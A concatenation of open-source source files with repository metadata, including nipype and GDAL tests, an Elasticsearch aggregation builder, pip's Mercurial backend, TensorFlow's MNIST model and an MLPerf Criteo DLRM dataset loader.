FreeCADGui.doCommand('Gui.Selection.addSelection(FreeCAD.ActiveDocument.' + obj + ')')
FreeCADGui.updateGui()
if FreeCAD.GuiUp:
FreeCADGui.addCommand('Path_Engrave', CommandPathEngrave())
| lgpl-2.1 |
carlohamalainen/nipype | nipype/interfaces/slicer/registration/tests/test_auto_ACPCTransform.py | 5 | 1197 | # AUTO-GENERATED by tools/checkspecs.py - DO NOT EDIT
from nipype.testing import assert_equal
from nipype.interfaces.slicer.registration.specialized import ACPCTransform
def test_ACPCTransform_inputs():
input_map = dict(acpc=dict(argstr='--acpc %s...',
),
args=dict(argstr='%s',
),
debugSwitch=dict(argstr='--debugSwitch ',
),
environ=dict(nohash=True,
usedefault=True,
),
ignore_exception=dict(nohash=True,
usedefault=True,
),
midline=dict(argstr='--midline %s...',
),
outputTransform=dict(argstr='--outputTransform %s',
hash_files=False,
),
terminal_output=dict(mandatory=True,
nohash=True,
),
)
inputs = ACPCTransform.input_spec()
for key, metadata in input_map.items():
for metakey, value in metadata.items():
yield assert_equal, getattr(inputs.traits()[key], metakey), value
def test_ACPCTransform_outputs():
output_map = dict(outputTransform=dict(),
)
outputs = ACPCTransform.output_spec()
for key, metadata in output_map.items():
for metakey, value in metadata.items():
yield assert_equal, getattr(outputs.traits()[key], metakey), value
| bsd-3-clause |
srisankethu/coala-bears | tests/c_languages/ClangComplexityBearTest.py | 24 | 3773 | import os
import unittest
from queue import Queue
from clang.cindex import Index
from coalib.results.Result import Result
from coalib.results.SourceRange import SourceRange
from coalib.settings.Section import Section
from bears.c_languages.ClangComplexityBear import (
ClangComplexityBear)
from coalib.testing.BearTestHelper import generate_skip_decorator
from coalib.testing.LocalBearTestHelper import execute_bear
@generate_skip_decorator(ClangComplexityBear)
class ClangComplexityBearTest(unittest.TestCase):
def setUp(self):
self.filename = os.path.abspath(os.path.join(os.path.dirname(__file__),
'codeclone_detection',
'conditions_samples.c'))
self.file = 'fake'
self.queue = Queue()
self.section = Section('test section')
self.bear = ClangComplexityBear(self.section, self.queue)
def test_calculation(self):
"""
Testing that number of decision points and exit points are calculated
correctly.
"""
expected = [
('used(int, int)', 3),
('returned(int, int)', 1),
('loopy(int, int)', 5),
('in_condition(int, int)', 1),
('assignation(int, int)', 2),
('arithmetics(int, int)', 1),
('levels(int, int, int)', 10),
('structing(struct test_struct, struct test_struct *)', 1),
('switching(int, int)', 2)]
root = Index.create().parse(self.filename).cursor
complexities_gen = self.bear.complexities(root, self.filename)
results = [(cursor.displayname, complexity)
for cursor, complexity in complexities_gen]
self.assertSequenceEqual(results, expected)
def test_output(self):
"""
Validating that the yielded results are correct.
"""
affected_code = (SourceRange.from_values(
self.filename,
start_line=111,
start_column=1,
end_line=143,
end_column=2),)
expected_result = Result(
self.bear,
"The function 'levels(int, int, int)' should be simplified. Its "
'cyclomatic complexity is 10 which exceeds maximal recommended '
'value of 8.',
affected_code=affected_code)
with execute_bear(self.bear, self.filename, self.file, 8) as out:
self.assertEqual(len(out), 1)
out[0].additional_info = '' # Let's not test this, static and huge
self.assertEqual(out[0], expected_result)
def test_empty_declared_function(self):
"""
Should not take into account and display empty function declarations.
"""
self.filename = os.path.abspath(os.path.join(os.path.dirname(__file__),
'test_files',
'empty_declarations.c'))
expected = [('with_body(int *)', 1)]
root = Index.create().parse(self.filename).cursor
complexities_gen = self.bear.complexities(root, self.filename)
results = [(cursor.displayname, complexity)
for cursor, complexity in complexities_gen]
self.assertSequenceEqual(results, expected)
def test_file_does_not_exist(self):
"""
Tests that bear throws TranslationUnitLoadError when file does not
exist.
"""
from clang.cindex import TranslationUnitLoadError
generator = self.bear.execute('not_existing', self.file)
self.assertNotEqual(generator, None)
with self.assertRaisesRegex(TranslationUnitLoadError, 'C value error'):
yield generator
| agpl-3.0 |
tcarver/django-elastic | elastic/aggs.py | 2 | 4485 | ''' Define elastic aggregation(s) to be used in a search. '''
from elastic.query import Query
from elastic.exceptions import AggregationError
class Aggs:
''' Define a set of Aggregations. '''
def __init__(self, agg_arr=None):
self.aggs = {"aggregations": {}}
if agg_arr is not None:
if not isinstance(agg_arr, list):
agg_arr = [agg_arr]
for agg in agg_arr:
if not isinstance(agg, Agg):
raise AggregationError('not an aggregation')
self.aggs["aggregations"].update(agg.agg)
class Agg:
''' Aggregation Builder '''
AGGS = {
# metric aggregation
"avg": {"type": dict, "params": {"field": str}},
"min": {"type": dict, "params": {"field": str}},
"max": {"type": dict, "params": {"field": str}},
"sum": {"type": dict, "params": {"field": str}},
"stats": {"type": dict, "params": {"field": str}},
"extended_stats": {"type": dict, "params": {"field": str}},
"value_count": {"type": dict, "params": {"field": str}},
"top_hits": {"type": dict, "params": {"from": int, "size": int, "sort": list,
"_source": list, "highlight": dict}},
# bucket aggregation
"global": {"type": dict},
"filter": {"type": Query},
"filters": {"type": dict, "dict_type": Query},
"missing": {"type": dict, "params": {"field": str}},
"terms": {"type": dict, "params": {"field": str, "size": int, "order": (dict, list)}},
"significant_terms": {"type": dict, "params": {"field": str}},
"range": {"type": dict, "params": {"field": str, 'ranges': list}},
"nested": {"type": dict, "params": {"path": str}},
"reverse_nested": {"type": dict, "params": {"path": str}}
}
def __init__(self, agg_name, agg_type, agg_body, sub_agg=None):
''' Construct an aggregation based on the aggregation type.
@type agg_name: str
@param agg_name: Aggregation name.
@type agg_type: str
@param agg_type: Aggregation type (from AGGS).
@type agg_body: dict
@param agg_body: Aggregation body.
@type sub_agg: Agg
@param sub_agg: Bucketing aggregations can have sub-aggregations.
'''
self.agg = {agg_name: {}}
AGGS = Agg.AGGS
if agg_type in AGGS:
if isinstance(agg_body, AGGS[agg_type]["type"]):
if 'params' in Agg.AGGS[agg_type]:
for pkey in agg_body:
if pkey not in Agg.AGGS[agg_type]['params']:
raise AggregationError(pkey+' unrecognised aggregation parameter')
if not isinstance(agg_body[pkey], Agg.AGGS[agg_type]['params'][pkey]):
raise AggregationError('aggregation parameter incorrect type')
if 'list_type' in AGGS[agg_type]:
Agg._array_types(agg_body, AGGS[agg_type]['list_type'])
str_arr = []
[str_arr.append(Agg._get_query(q)) for q in agg_body]
self.agg[agg_name][agg_type] = str_arr
elif 'dict_type' in AGGS[agg_type]:
self.agg[agg_name][agg_type] = self._update_dict(agg_body)
else:
self.agg[agg_name][agg_type] = Agg._get_query(agg_body)
else:
raise AggregationError('aggregation type unknown: '+agg_type)
if sub_agg is not None:
self.agg[agg_name].update({"aggs": {}})
if not isinstance(sub_agg, list):
sub_agg = [sub_agg]
for sub in sub_agg:
self.agg[agg_name]['aggs'].update(sub.agg)
def _update_dict(self, qdict):
for k, v in qdict.items():
if isinstance(v, dict):
qdict[k] = self._update_dict(v)
else:
qdict[k] = self._get_query(v)
return qdict
@classmethod
def _get_query(cls, q):
''' Given a Query instance then return the Query dictionary. '''
if hasattr(q, 'query'):
return q.query
return q
@classmethod
def _array_types(cls, arr, atype):
''' Evaluate if array contents are atype objects. '''
if not all(isinstance(y, (atype)) for y in arr):
raise AggregationError("not a "+str(atype))
return True
| gpl-3.0 |
areski/django | tests/gis_tests/gdal_tests/test_envelope.py | 335 | 3667 | import unittest
from unittest import skipUnless
from django.contrib.gis.gdal import HAS_GDAL
if HAS_GDAL:
from django.contrib.gis.gdal import Envelope, GDALException
class TestPoint(object):
def __init__(self, x, y):
self.x = x
self.y = y
@skipUnless(HAS_GDAL, "GDAL is required")
class EnvelopeTest(unittest.TestCase):
def setUp(self):
self.e = Envelope(0, 0, 5, 5)
def test01_init(self):
"Testing Envelope initialization."
e1 = Envelope((0, 0, 5, 5))
Envelope(0, 0, 5, 5)
Envelope(0, '0', '5', 5) # Thanks to ww for this
Envelope(e1._envelope)
self.assertRaises(GDALException, Envelope, (5, 5, 0, 0))
self.assertRaises(GDALException, Envelope, 5, 5, 0, 0)
self.assertRaises(GDALException, Envelope, (0, 0, 5, 5, 3))
self.assertRaises(GDALException, Envelope, ())
self.assertRaises(ValueError, Envelope, 0, 'a', 5, 5)
self.assertRaises(TypeError, Envelope, 'foo')
self.assertRaises(GDALException, Envelope, (1, 1, 0, 0))
try:
Envelope(0, 0, 0, 0)
except GDALException:
self.fail("shouldn't raise an exception for min_x == max_x or min_y == max_y")
def test02_properties(self):
"Testing Envelope properties."
e = Envelope(0, 0, 2, 3)
self.assertEqual(0, e.min_x)
self.assertEqual(0, e.min_y)
self.assertEqual(2, e.max_x)
self.assertEqual(3, e.max_y)
self.assertEqual((0, 0), e.ll)
self.assertEqual((2, 3), e.ur)
self.assertEqual((0, 0, 2, 3), e.tuple)
self.assertEqual('POLYGON((0.0 0.0,0.0 3.0,2.0 3.0,2.0 0.0,0.0 0.0))', e.wkt)
self.assertEqual('(0.0, 0.0, 2.0, 3.0)', str(e))
def test03_equivalence(self):
"Testing Envelope equivalence."
e1 = Envelope(0.523, 0.217, 253.23, 523.69)
e2 = Envelope((0.523, 0.217, 253.23, 523.69))
self.assertEqual(e1, e2)
self.assertEqual((0.523, 0.217, 253.23, 523.69), e1)
def test04_expand_to_include_pt_2_params(self):
"Testing Envelope expand_to_include -- point as two parameters."
self.e.expand_to_include(2, 6)
self.assertEqual((0, 0, 5, 6), self.e)
self.e.expand_to_include(-1, -1)
self.assertEqual((-1, -1, 5, 6), self.e)
def test05_expand_to_include_pt_2_tuple(self):
"Testing Envelope expand_to_include -- point as a single 2-tuple parameter."
self.e.expand_to_include((10, 10))
self.assertEqual((0, 0, 10, 10), self.e)
self.e.expand_to_include((-10, -10))
self.assertEqual((-10, -10, 10, 10), self.e)
def test06_expand_to_include_extent_4_params(self):
"Testing Envelope expand_to_include -- extent as 4 parameters."
self.e.expand_to_include(-1, 1, 3, 7)
self.assertEqual((-1, 0, 5, 7), self.e)
def test06_expand_to_include_extent_4_tuple(self):
"Testing Envelope expand_to_include -- extent as a single 4-tuple parameter."
self.e.expand_to_include((-1, 1, 3, 7))
self.assertEqual((-1, 0, 5, 7), self.e)
def test07_expand_to_include_envelope(self):
"Testing Envelope expand_to_include with Envelope as parameter."
self.e.expand_to_include(Envelope(-1, 1, 3, 7))
self.assertEqual((-1, 0, 5, 7), self.e)
def test08_expand_to_include_point(self):
"Testing Envelope expand_to_include with Point as parameter."
self.e.expand_to_include(TestPoint(-1, 1))
self.assertEqual((-1, 0, 5, 5), self.e)
self.e.expand_to_include(TestPoint(10, 10))
self.assertEqual((-1, 0, 10, 10), self.e)
| bsd-3-clause |
bjornlevi/5thpower | afmaeli/env/lib/python3.6/site-packages/pip/vcs/mercurial.py | 514 | 3472 | from __future__ import absolute_import
import logging
import os
import tempfile
from pip.utils import display_path, rmtree
from pip.vcs import vcs, VersionControl
from pip.download import path_to_url
from pip._vendor.six.moves import configparser
logger = logging.getLogger(__name__)
class Mercurial(VersionControl):
name = 'hg'
dirname = '.hg'
repo_name = 'clone'
schemes = ('hg', 'hg+http', 'hg+https', 'hg+ssh', 'hg+static-http')
def export(self, location):
"""Export the Hg repository at the url to the destination location"""
temp_dir = tempfile.mkdtemp('-export', 'pip-')
self.unpack(temp_dir)
try:
self.run_command(
['archive', location], show_stdout=False, cwd=temp_dir)
finally:
rmtree(temp_dir)
def switch(self, dest, url, rev_options):
repo_config = os.path.join(dest, self.dirname, 'hgrc')
config = configparser.SafeConfigParser()
try:
config.read(repo_config)
config.set('paths', 'default', url)
with open(repo_config, 'w') as config_file:
config.write(config_file)
except (OSError, configparser.NoSectionError) as exc:
logger.warning(
'Could not switch Mercurial repository to %s: %s', url, exc,
)
else:
self.run_command(['update', '-q'] + rev_options, cwd=dest)
def update(self, dest, rev_options):
self.run_command(['pull', '-q'], cwd=dest)
self.run_command(['update', '-q'] + rev_options, cwd=dest)
def obtain(self, dest):
url, rev = self.get_url_rev()
if rev:
rev_options = [rev]
rev_display = ' (to revision %s)' % rev
else:
rev_options = []
rev_display = ''
if self.check_destination(dest, url, rev_options, rev_display):
logger.info(
'Cloning hg %s%s to %s',
url,
rev_display,
display_path(dest),
)
self.run_command(['clone', '--noupdate', '-q', url, dest])
self.run_command(['update', '-q'] + rev_options, cwd=dest)
def get_url(self, location):
url = self.run_command(
['showconfig', 'paths.default'],
show_stdout=False, cwd=location).strip()
if self._is_local_repository(url):
url = path_to_url(url)
return url.strip()
def get_revision(self, location):
current_revision = self.run_command(
['parents', '--template={rev}'],
show_stdout=False, cwd=location).strip()
return current_revision
def get_revision_hash(self, location):
current_rev_hash = self.run_command(
['parents', '--template={node}'],
show_stdout=False, cwd=location).strip()
return current_rev_hash
def get_src_requirement(self, dist, location):
repo = self.get_url(location)
if not repo.lower().startswith('hg:'):
repo = 'hg+' + repo
egg_project_name = dist.egg_name().split('-', 1)[0]
if not repo:
return None
current_rev_hash = self.get_revision_hash(location)
return '%s@%s#egg=%s' % (repo, current_rev_hash, egg_project_name)
def check_version(self, dest, rev_options):
"""Always assume the versions don't match"""
return False
vcs.register(Mercurial)
| mit |
keshr3106/ThinkStats2 | code/mystery.py | 68 | 1578 | """This file contains code used in "Think Stats",
by Allen B. Downey, available from greenteapress.com
Copyright 2014 Allen B. Downey
License: GNU GPLv3 http://www.gnu.org/licenses/gpl.html
"""
from __future__ import print_function
import random
import numpy as np
import scipy.stats
def write_sample(sample, filename):
"""Write a sequence of floats to a file.
"""
fp = open(filename, 'w')
for x in sample:
fp.write('%f\n' % x)
fp.close()
def uniform_sample(n):
return [random.uniform(0, 100) for i in range(n)]
def triangular_sample(n):
return [random.triangular(0, 100) for i in range(n)]
def expo_sample(n):
return [random.expovariate(1.0/50) for i in range(n)]
def gauss_sample(n):
return [random.gauss(50, 25) for i in range(n)]
def lognorm_sample(n):
return [random.lognormvariate(3, 1.3) for i in range(n)]
def pareto_sample(n):
return [10 * random.paretovariate(1.2) for i in range(n)]
def weibull_sample(n):
return [random.weibullvariate(60, 5) for i in range(n)]
def gumbel_sample(n):
rv = scipy.stats.gumbel_r(45, 10)
return rv.rvs(n)
def main():
funcs = [uniform_sample, triangular_sample, expo_sample,
gauss_sample, lognorm_sample, pareto_sample,
weibull_sample, gumbel_sample]
for i in range(len(funcs)):
sample = funcs[i](1000)
print(np.mean(sample))
filename = 'mystery%d.dat' % i
write_sample(sample, filename)
if __name__ == '__main__':
main()
| gpl-3.0 |
benedictpaten/marginPhase | toil/src/toil_marginphase/scripts/chunking_analysis.py | 1 | 1756 | #!/usr/bin/env python
from __future__ import print_function
import argparse
import glob
import gzip
import math
import numpy as np
import os
def parse_args():
parser = argparse.ArgumentParser("Analyzes chunks from curated marginPhase output and logfiles")
parser.add_argument('--log_dir', '-l', dest='log_dir', required=True, type=str,
help='Location where logs are')
parser.add_argument('--full_vcf_dir', '-f', dest='full_vcf_dir', required=True, type=str,
help='Location where full vcfs are')
parser.add_argument('--merged_vcf_dir', '-m', dest='merged_vcf_dir', required=True, type=str,
help='Location where merged vcfs are')
return parser.parse_args()
def main():
args = parse_args()
assert False not in map(os.path.isdir, [args.log_dir, args.full_vcf_dir, args.merged_vcf_dir])
uuids = map(lambda x: x.rstrip('merged.full.vcf'), os.listdir(args.full_vcf_dir))
uuids.sort()
for uuid in uuids:
print(uuid)
assert ("np" in uuid) != ("pb" in uuid)
nanopore = "np" in uuid
chunk_type = uuid.split(".")[-1]
full_vcf = os.path.join(args.full_vcf_dir, "{}.merged.full.vcf".format(uuid))
merged_vcf_files = glob.glob(os.path.join(args.merged_vcf_dir, "{}/{}.merged.*.vcf"
.format("np" if nanopore else "pb", uuid)))
log_file = os.path.join(args.log_dir, "merge_chunks/{}.toil-marginPhase.19q.{}.merge_chunks.log"
.format("np" if nanopore else "pb", chunk_type))
assert (False not in map(os.path.isfile, [full_vcf, log_file])) and len(merged_vcf_files) != 0
if __name__ == "__main__":
main() | mit |
mengxn/tensorflow | tensorflow/examples/tutorials/mnist/mnist.py | 65 | 5292 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Builds the MNIST network.
Implements the inference/loss/training pattern for model building.
1. inference() - Builds the model as far as is required for running the network
forward to make predictions.
2. loss() - Adds to the inference model the layers required to generate loss.
3. training() - Adds to the loss model the Ops required to generate and
apply gradients.
This file is used by the various "fully_connected_*.py" files and not meant to
be run.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
import tensorflow as tf
# The MNIST dataset has 10 classes, representing the digits 0 through 9.
NUM_CLASSES = 10
# The MNIST images are always 28x28 pixels.
IMAGE_SIZE = 28
IMAGE_PIXELS = IMAGE_SIZE * IMAGE_SIZE
def inference(images, hidden1_units, hidden2_units):
"""Build the MNIST model up to where it may be used for inference.
Args:
images: Images placeholder, from inputs().
hidden1_units: Size of the first hidden layer.
hidden2_units: Size of the second hidden layer.
Returns:
softmax_linear: Output tensor with the computed logits.
"""
# Hidden 1
with tf.name_scope('hidden1'):
weights = tf.Variable(
tf.truncated_normal([IMAGE_PIXELS, hidden1_units],
stddev=1.0 / math.sqrt(float(IMAGE_PIXELS))),
name='weights')
biases = tf.Variable(tf.zeros([hidden1_units]),
name='biases')
hidden1 = tf.nn.relu(tf.matmul(images, weights) + biases)
# Hidden 2
with tf.name_scope('hidden2'):
weights = tf.Variable(
tf.truncated_normal([hidden1_units, hidden2_units],
stddev=1.0 / math.sqrt(float(hidden1_units))),
name='weights')
biases = tf.Variable(tf.zeros([hidden2_units]),
name='biases')
hidden2 = tf.nn.relu(tf.matmul(hidden1, weights) + biases)
# Linear
with tf.name_scope('softmax_linear'):
weights = tf.Variable(
tf.truncated_normal([hidden2_units, NUM_CLASSES],
stddev=1.0 / math.sqrt(float(hidden2_units))),
name='weights')
biases = tf.Variable(tf.zeros([NUM_CLASSES]),
name='biases')
logits = tf.matmul(hidden2, weights) + biases
return logits
def loss(logits, labels):
"""Calculates the loss from the logits and the labels.
Args:
logits: Logits tensor, float - [batch_size, NUM_CLASSES].
labels: Labels tensor, int32 - [batch_size].
Returns:
loss: Loss tensor of type float.
"""
labels = tf.to_int64(labels)
cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(
labels=labels, logits=logits, name='xentropy')
return tf.reduce_mean(cross_entropy, name='xentropy_mean')
def training(loss, learning_rate):
"""Sets up the training Ops.
Creates a summarizer to track the loss over time in TensorBoard.
Creates an optimizer and applies the gradients to all trainable variables.
The Op returned by this function is what must be passed to the
`sess.run()` call to cause the model to train.
Args:
loss: Loss tensor, from loss().
learning_rate: The learning rate to use for gradient descent.
Returns:
train_op: The Op for training.
"""
# Add a scalar summary for the snapshot loss.
tf.summary.scalar('loss', loss)
# Create the gradient descent optimizer with the given learning rate.
optimizer = tf.train.GradientDescentOptimizer(learning_rate)
# Create a variable to track the global step.
global_step = tf.Variable(0, name='global_step', trainable=False)
# Use the optimizer to apply the gradients that minimize the loss
# (and also increment the global step counter) as a single training step.
train_op = optimizer.minimize(loss, global_step=global_step)
return train_op
def evaluation(logits, labels):
"""Evaluate the quality of the logits at predicting the label.
Args:
logits: Logits tensor, float - [batch_size, NUM_CLASSES].
labels: Labels tensor, int32 - [batch_size], with values in the
range [0, NUM_CLASSES).
Returns:
A scalar int32 tensor with the number of examples (out of batch_size)
that were predicted correctly.
"""
# For a classifier model, we can use the in_top_k Op.
# It returns a bool tensor with shape [batch_size] that is true for
# the examples where the label is in the top k (here k=1)
# of all logits for that example.
correct = tf.nn.in_top_k(logits, labels, 1)
# Return the number of true entries.
return tf.reduce_sum(tf.cast(correct, tf.int32))
| apache-2.0 |
mlperf/inference_results_v0.7 | closed/Neuchips/code/dlrm-99/Server/python/criteo.py | 1 | 14814 | """
implementation of criteo dataset
"""
# pylint: disable=unused-argument,missing-docstring
import logging
import os
import sys
import re
import time
import random
import numpy as np
import sklearn.metrics
import inspect
# pytorch
import torch
from torch.utils.data import Dataset, RandomSampler
logging.basicConfig(level=logging.INFO)
log = logging.getLogger("criteo")
# add dlrm code path
try:
dlrm_dir_path = os.environ['DLRM_DIR']
sys.path.append(dlrm_dir_path)
except KeyError:
print("ERROR: Please set DLRM_DIR environment variable to the dlrm code location")
sys.exit(0)
#import dataset
import dlrm_data_pytorch as dp
import data_loader_terabyte
class Criteo(Dataset):
def __init__(self,
model,
data_path,
name,
pre_process,
use_cache,
count=None,
samples_to_aggregate_fix=None,
samples_to_aggregate_min=None,
samples_to_aggregate_max=None,
samples_to_aggregate_quantile_file=None,
samples_to_aggregate_trace_file=None,
test_num_workers=0,
max_ind_range=-1,
sub_sample_rate=0.0,
mlperf_bin_loader=False,
randomize="total",
memory_map=False):
super().__init__()
self.model = model
self.count = count
self.random_offsets = []
self.use_fixed_size = ((samples_to_aggregate_quantile_file is None) and
(samples_to_aggregate_min is None or samples_to_aggregate_max is None))
if self.use_fixed_size:
# fixed size queries
self.samples_to_aggregate = 1 if samples_to_aggregate_fix is None else samples_to_aggregate_fix
self.samples_to_aggregate_min = None
self.samples_to_aggregate_max = None
else:
# variable size queries
self.samples_to_aggregate = 1
self.samples_to_aggregate_min = samples_to_aggregate_min
self.samples_to_aggregate_max = samples_to_aggregate_max
self.samples_to_aggregate_quantile_file = samples_to_aggregate_quantile_file
if name == "kaggle":
raw_data_file = data_path + "/train.txt"
processed_data_file = data_path + "/kaggleAdDisplayChallenge_processed.npz"
elif name == "terabyte":
raw_data_file = data_path + "/day"
processed_data_file = data_path + "/terabyte_processed.npz"
else:
raise ValueError("only kaggle|terabyte dataset options are supported")
self.use_mlperf_bin_loader = mlperf_bin_loader and memory_map and name == "terabyte"
# debug prints
# print("dataset filenames", raw_data_file, processed_data_file)
self.test_data = dp.CriteoDataset(
dataset=name,
max_ind_range=max_ind_range,
sub_sample_rate=sub_sample_rate,
randomize=randomize,
split="test",
raw_path=raw_data_file,
pro_data=processed_data_file,
memory_map=memory_map
)
self.num_individual_samples = len(self.test_data)
if self.use_mlperf_bin_loader:
test_file = data_path + "/terabyte_processed_test.bin"
counts_file = raw_data_file + '_fea_count.npz'
data_loader_terabyte.numpy_to_binary(
input_files=[raw_data_file + '_23_reordered.npz'],
output_file_path=data_path + "/terabyte_processed_test.bin",
split="test")
self.test_data = data_loader_terabyte.CriteoBinDataset(
data_file=test_file,
counts_file=counts_file,
batch_size=self.samples_to_aggregate,
max_ind_range=max_ind_range
)
self.test_loader = torch.utils.data.DataLoader(
self.test_data,
batch_size=None,
batch_sampler=None,
shuffle=False,
num_workers=0,
collate_fn=None,
pin_memory=False,
drop_last=False,
)
else:
self.test_loader = torch.utils.data.DataLoader(
self.test_data,
batch_size=self.samples_to_aggregate,
shuffle=False,
num_workers=test_num_workers,
collate_fn=dp.collate_wrapper_criteo,
pin_memory=False,
drop_last=False,
)
# WARNING: Note that the orignal dataset returns number of samples, while the
# binary dataset returns the number of batches. Therefore, when using a mini-batch
# of size samples_to_aggregate as an item we need to adjust the original dataset item_count.
# On the other hand, data loader always returns number of batches.
if self.use_fixed_size:
# the offsets for fixed query size will be generated on-the-fly later on
print("Using fixed query size: " + str(self.samples_to_aggregate))
if self.use_mlperf_bin_loader:
self.num_aggregated_samples = len(self.test_data)
# self.num_aggregated_samples2 = len(self.test_loader)
else:
self.num_aggregated_samples = (self.num_individual_samples + self.samples_to_aggregate - 1) // self.samples_to_aggregate
# self.num_aggregated_samples2 = len(self.test_loader)
else:
# the offsets for variable query sizes will be pre-generated here
if self.samples_to_aggregate_quantile_file is None:
# generate number of samples in a query from a uniform(min,max) distribution
print("Using variable query size: uniform distribution (" + str(self.samples_to_aggregate_min) + "," + str(self.samples_to_aggregate_max) + ")")
done = False
qo = 0
while done == False:
self.random_offsets.append(int(qo))
qs = random.randint(self.samples_to_aggregate_min, self.samples_to_aggregate_max)
qo = min(qo + qs, self.num_individual_samples)
if qo >= self.num_individual_samples:
done = True
self.random_offsets.append(int(qo))
# compute min and max number of samples
nas_max = (self.num_individual_samples + self.samples_to_aggregate_min - 1) // self.samples_to_aggregate_min
nas_min = (self.num_individual_samples + self.samples_to_aggregate_max - 1) // self.samples_to_aggregate_max
else:
# generate number of samples in a query from a custom distribution,
# with quantile (inverse of its cdf) given in the file. Note that
# quantile is related to the concept of percentile in statistics.
#
# For instance, assume that we have the following distribution for query length
# length = [100, 200, 300, 400, 500, 600, 700] # x
# pdf = [0.1, 0.6, 0.1, 0.05, 0.05, 0.05, 0.05] # p(x)
# cdf = [0.1, 0.7, 0.8, 0.85, 0.9, 0.95, 1.0] # f(x) = prefix-sum of p(x)
# The inverse of its cdf with granularity of 0.05 can be written as
# quantile_p = [.05, .10, .15, .20, .25, .30, .35, .40, .45, .50, .55, .60, .65, .70, .75, .80, .85, .90, .95, 1.0] # p
# quantile_x = [100, 100, 200, 200, 200, 200, 200, 200, 200, 200, 200, 200, 200, 200, 300, 300, 400, 500, 600, 700] # q(p) = x, such that f(x) >= p
# Notice that once we have quantile, we can apply inverse transform sampling method.
print("Using variable query size: custom distribution (file " + str(samples_to_aggregate_quantile_file) + ")")
with open(self.samples_to_aggregate_quantile_file, 'r') as f:
line = f.readline()
quantile = np.fromstring(line, dtype=int, sep=", ")
# debug prints
# print(quantile)
# print(len(quantile))
l = len(quantile)
done = False
qo = 0
while done == False:
self.random_offsets.append(int(qo))
pr = np.random.randint(low=0, high=l)
qs = quantile[pr]
qo = min(qo + qs, self.num_individual_samples)
if qo >= self.num_individual_samples:
done = True
self.random_offsets.append(int(qo))
# compute min and max number of samples
nas_max = (self.num_individual_samples + quantile[0] - 1) // quantile[0]
nas_min = (self.num_individual_samples + quantile[-1]- 1) // quantile[-1]
# reset num_aggregated_samples
self.num_aggregated_samples = len(self.random_offsets) - 1
# check num_aggregated_samples
if self.num_aggregated_samples < nas_min or nas_max < self.num_aggregated_samples:
raise ValueError("Sannity check failed")
# limit number of items to count if needed
if self.count is not None:
self.num_aggregated_samples = min(self.count, self.num_aggregated_samples)
# dump the trace of aggregated samples
if samples_to_aggregate_trace_file is not None:
with open(samples_to_aggregate_trace_file, 'w') as f:
for l in range(self.num_aggregated_samples):
if self.use_fixed_size:
s = l * self.samples_to_aggregate
e = min((l + 1) * self.samples_to_aggregate, self.num_individual_samples)
else:
s = self.random_offsets[l]
e = self.random_offsets[l+1]
f.write(str(s) + ", " + str(e) + ", " + str(e-s) + "\n")
def get_item_count(self):
# get number of items in the dataset
return self.num_aggregated_samples
''' lg compatibilty routine '''
def unload_query_samples(self, sample_list):
self.items_in_memory = {}
''' lg compatibilty routine '''
def load_query_samples(self, sample_list):
self.items_in_memory = {}
# WARNING: notice that while DataLoader is iterable-style, the Dataset
# can be iterable- or map-style, and Criteo[Bin]Dataset are the latter
# This means that we can not index into DataLoader, but can enumerate it,
# while we can index into the dataset itself.
for l in sample_list:
# approach 1: single sample as an item
'''
self.items_in_memory[l] = self.test_data[l]
'''
# approach 2: multiple samples as an item
if self.use_fixed_size:
s = l * self.samples_to_aggregate
e = min((l + 1) * self.samples_to_aggregate, self.num_individual_samples)
else:
s = self.random_offsets[l]
e = self.random_offsets[l+1]
ls = [self.test_data[i] for i in range(s, e)]
if self.use_mlperf_bin_loader:
# NOTE: in binary dataset the values are transformed
ls_t = list(zip(*ls))
X = torch.cat(ls_t[0])
lS_i = torch.cat(ls_t[2], dim=1)
T = torch.cat(ls_t[3])
d, s = self.model.collate_pre(X, lS_i)
exp = self.model.collate_post(d, s)
self.items_in_memory[l] = (T, exp)
else:
# NOTE: in original dataset the values are not transformed
# and collate besides stacking them also transforms them
self.items_in_memory[l] = self.test_loader.collate_fn(ls)
self.last_loaded = time.time()
''' lg compatibilty routine '''
def get_samples(self, id_list):
# build list tuples as need by the batch conversion routine
# index i from id_list corresponds to a particular query_id
idx_offsets = [0]
ls = []
for i in id_list:
(T, _) = self.items_in_memory[i]
idx_offsets.append(idx_offsets[-1] + T.numel())
ls.append(self.items_in_memory[i])
# debug prints
# print(idx_offsets)
# approach 1: collate a mini-batch of single samples
'''
if self.use_mlperf_bin_loader:
# NOTE: in binary dataset the values are transformed
ls_t = list(zip(*ls))
X = torch.cat(ls_t[0])
(num_s, len_ls) = torch.cat(ls_t[1], dim=1).size()
lS_o = torch.stack([torch.tensor(range(len_ls)) for _ in range(num_s)])
lS_i = torch.cat(ls_t[2], dim=1)
T = torch.cat(ls_t[3])
else:
# NOTE: in original dataset the values are not transformed and collate besides stacking transforms them
X, lS_o, lS_i, T = self.test_loader.collate_fn(ls)
'''
# approach 2: collate a mini-batch of multiple samples
# NOTE: recall that the samples have already been transformed for both datasets
# (by earlier calls in load_query_samples), therefore we just need to stack them
ls_t = list(zip(*ls))
T = torch.cat(ls_t[0])
exp = b''.join(ls_t[1])
return (T, idx_offsets, exp)
# Pre processing
def pre_process_criteo_dlrm(x):
return x
# Post processing
class DlrmPostProcess:
def __init__(self):
self.good = 0
self.total = 0
self.roc_auc = 0
self.results = []
def __call__(self, results, expected=None, result_dict=None):
n = len(results)
res = np.asarray(results)
exp = np.array(expected)
processed_results = np.column_stack((res, exp))
self.good += (int((res.round() == exp).sum()))
self.total += n
return processed_results
def add_results(self, results):
self.results.append(results)
def start(self):
self.good = 0
self.total = 0
self.roc_auc = 0
self.results = []
def finalize(self, result_dict, ds=False, output_dir=None):
# AUC metric
self.results = np.concatenate(self.results, axis=0)
results, targets = list(zip(*self.results))
results = np.array(results)
targets = np.array(targets)
self.roc_auc = sklearn.metrics.roc_auc_score(targets, results)
result_dict["good"] = self.good
result_dict["total"] = self.total
result_dict["roc_auc"] = self.roc_auc
| apache-2.0 |
